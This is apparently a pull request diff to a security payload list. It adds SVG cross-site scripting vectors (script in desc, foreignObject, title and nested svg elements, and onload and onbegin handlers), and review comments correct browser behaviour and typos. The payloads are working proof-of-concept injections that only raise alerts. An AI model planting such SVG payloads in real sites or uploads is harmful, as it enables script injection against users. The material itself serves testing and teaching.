XSS in SVG: more examples + nesting #729

Open · wants to merge 1 commit into base: master
62 changes: 62 additions & 0 deletions XSS Injection/README.md
Expand Up @@ -383,6 +383,8 @@ vbscript:msgbox("XSS")

### XSS in SVG

Simple script. Codename: green triangle

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
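Review bot: the two added lines at the top of this hunk, `Simple script. Codename: green triangle`, are a sentence fragment, and the codename tells the reader nothing about the vector; suggest describing the payload instead, e.g. `A bare <script> element as a direct child of the SVG root.` The later sections in this PR carry an `Author:` tag while this one does not, so either add it here or drop it everywhere for consistency.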
Expand All @@ -395,6 +397,29 @@ vbscript:msgbox("XSS")
</svg>
```

More comprehensive payload with svg tag attribute, desc script, foreignObject script, foreignObject iframe, title script, animatetransform event and simple script. Codename: red lignthning. Author: noraj.

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" width="100" height="100" xmlns="http://www.w3.org/2000/svg" onload="alert('svg attribut')">
<polygon id="lightning" points="0,100 50,25 50,75 100,0" fill="#ff1919" stroke="#ff0000"/>
<desc><script>alert('svg desc')</script></desc>
<foreignObject><script>alert('svg foreignObject')</script></foreignObject>
<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('svg foreignObject iframe');" width="400" height="250"/>
</foreignObject>
<title><script>alert('svg title')</script></title>
<animatetransform onbegin="alert('svg animatetransform onbegin')"></animatetransform>
<script type="text/javascript">
alert('svg script');
</script>
</svg>
```



### XSS in SVG (short)

```javascript
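Review bot: the `<animatetransform onbegin="...">` line in the "red lightning" payload will not fire as written. This file starts with an XML declaration and a DOCTYPE, so when it is served as `image/svg+xml` it is parsed by the XML parser, where element names are case-sensitive; the SVG element is `animateTransform`, and the lowercase spelling is an unknown element with no timing behaviour. The lowercase form only works inside an HTML document, where the HTML parser fixes up the case. Suggest `<animateTransform onbegin="alert('svg animateTransform onbegin')"/>` and a sentence saying which variants are HTML-only. Two typos in the same hunk: `red lignthning` should be `red lightning`, and `alert('svg attribut')` should be `alert('svg attribute')`. Finally, the description should state that none of these handlers run when the SVG is loaded via `<img>` or as a CSS image (scripting is disabled in image mode); the file has to be navigated to directly or embedded with `<object>`, `<embed>` or `<iframe>`.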
Expand All @@ -405,6 +430,43 @@ vbscript:msgbox("XSS")
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
```

### XSS in SVG (nesting)

Including a remote SVG image in a SVG works but won't trigger the XSS embedded in the remote SVG. Author: noraj.

SVG 1.x (xlink:href)

```xml
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/>
</svg>
```

Including a remote SVG fragment in a SVG works but won't trigger the XSS embedded in the remote SVG element because it's impossible to add vulnerable attribute on a polygon/rect/etc sicne the `style` attribute is no longer a vector on modern browsers. Author: noraj.

SVG 1.x (xlink:href)

```xml
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/>
</svg>
```

However, including svg tags in SVG documents works and allows XSS execution from sub-SVGs. Codename: french flag. Author: noraj.

```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<svg x="10">
<rect x="10" y="10" height="100" width="100" style="fill: #002654"/>
<script type="text/javascript">alert('sub-svg 1');</script>
</svg>
<svg x="200">
<rect x="10" y="10" height="100" width="100" style="fill: #ED2939"/>
<script type="text/javascript">alert('sub-svg 2');</script>
</svg>
</svg>
```

### XSS in Markdown

```csharp
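Review bot: the explanation given for the `<use xlink:href="http://127.0.0.1:9999/...#lightning">` case (that `style` is no longer a vector, so no vulnerable attribute can be put on a `polygon`) is not the reason the XSS does not fire. Modern Chromium and Firefox refuse cross-origin `<use>` references outright, so the test as written only does anything if the outer SVG is also served from `http://127.0.0.1:9999`, and even then scripts in the cloned fragment are not executed, since SVG 2 specifies that `<script>` elements in the `use` shadow tree do not run. For the `<image xlink:href="...svg">` case the stated behaviour is right but the reason is worth adding: the referenced SVG is loaded in the same scripting-disabled image mode as an HTML `<img>`, with external resources blocked. In the "french flag" example the sub-`<svg>` elements are inline in the same document, so the scripts run simply because they are part of that document; the sentence `allows XSS execution from sub-SVGs` should say "inline" so readers do not mistake it for a remote-inclusion vector, and the unused `xmlns:xlink` declaration can be dropped there. Typos in this hunk: `sicne` should be `since`, and `in a SVG` should be `in an SVG` (twice).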